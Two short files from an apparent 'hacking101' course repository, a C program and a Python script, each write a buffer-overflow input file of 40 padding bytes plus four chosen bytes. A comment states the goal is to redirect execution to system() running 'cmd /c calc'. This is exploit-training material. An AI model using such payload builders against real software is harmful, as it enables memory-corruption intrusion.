File: hacking101/code/bake.c
#include <stdio.h>
#include <windows.h>
#include <string.h>




int main(int argc, char *argv[])
{
	char command[1000] = {0};
	

	// padding
	for(int i=0; i< 40; i++) {
		strcat(command, "A");	
	}
	
	// some bytes of your choice
	strcat(command,  "\x45\x44\x43\x42");
	
	
	char const   filename[20] = "input.txt";
	

	printf("Writing %s to %s\n", command, filename);
	
	
	FILE * fp = fopen(filename, "wb");
	fwrite(command,1, strlen(command) + 1, fp);
	fclose(fp);

    return 0;
}

File: hacking101/code/bake.py
#encoding: utf-8
## jump to the system() function with cmd /c calc as argument


padding = "A" * 40
 
input = padding + "\x45\x44\x43\x42" 

with open("input.txt", "wb") as file:
	file.write(input.encode('latin_1'))
